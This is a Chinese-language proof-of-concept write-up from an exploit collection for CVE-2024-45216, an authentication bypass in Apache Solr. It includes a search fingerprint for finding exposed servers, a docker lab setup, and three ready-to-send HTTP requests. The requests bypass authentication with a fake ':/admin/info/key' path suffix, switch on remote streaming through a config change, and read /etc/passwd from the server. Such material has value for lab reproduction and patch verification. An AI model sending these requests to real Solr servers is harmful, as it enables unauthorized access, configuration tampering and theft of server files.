Awesome-POC/中间件漏洞/Apache Solr 认证绕过漏洞 CVE-2024-45216.md

# Apache Solr 认证绕过漏洞 CVE-2024-45216

## 漏洞描述

2024 年 10 月，Apache Solr 官方披露 CVE-2024-45216 Apache Solr 认证绕过漏洞。攻击者可构造恶意请求利用 PKIAuthenticationPlugin 造成权限绕过，从而可在未认证的情况下调用。官方已发布安全更新，建议升级至最新版本。

参考链接：

- https://solr.apache.org/security.html#cve-2024-45216-apache-solr-authentication-bypass-possible-using-a-fake-url-path-ending

## 漏洞影响

```
5.3.0 <= Apache Solr < 8.11.4
9.0.0 <= Apache Solr < 9.7.0
```

## 网络测绘

```
app="APACHE-Solr"
```

## 环境搭建

docker-compose.yml

```
version: '2'
services:
 solr:
   image: vulhub/solr:8.2.0
   ports:
    - "8983:8983"
    - "5005:5005"
```

执行如下命令启动一个 Apache Solr 8.2.0 服务器：

```
docker-compose up -d
```

服务启动后，访问 `http://your-ip:8983` 即可查看到一个无需权限的 Apache Solr 服务。

## 漏洞复现

绕过身份验证，获取 core 名称：

```
GET /solr/admin/cores:/admin/info/key?indexInfo=false&wt=json HTTP/1.1
Host: your-ip:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close
```

![](images/Apache%20Solr%20认证绕过漏洞%20CVE-2024-45216/image-20241105160749641.png)

此时读取文件将报错 `Remote Streaming is disabled`，这是因为 Remote streaming 是默认关闭的：

![](images/Apache%20Solr%20认证绕过漏洞%20CVE-2024-45216/image-20241105161407187.png)

修改 core 配置，开启 Remote streaming：

```
POST /solr/demo/config:/admin/info/key HTTP/1.1
Host: your-ip:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Content-Type: application/json
Connection: close
Content-Length: 80

{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
```

![](images/Apache%20Solr%20认证绕过漏洞%20CVE-2024-45216/image-20241105161313234.png)

读取文件，例如 `/etc/passwd`：

```
GET /solr/demo/debug/dump:/admin/info/key?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1
Host: your-ip:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close
```

![](images/Apache%20Solr%20认证绕过漏洞%20CVE-2024-45216/image-20241105161237958.png)

## 漏洞修复

官方已发布修复方案，受影响的用户建议更新至安全版本： https://solr.apache.org/downloads.html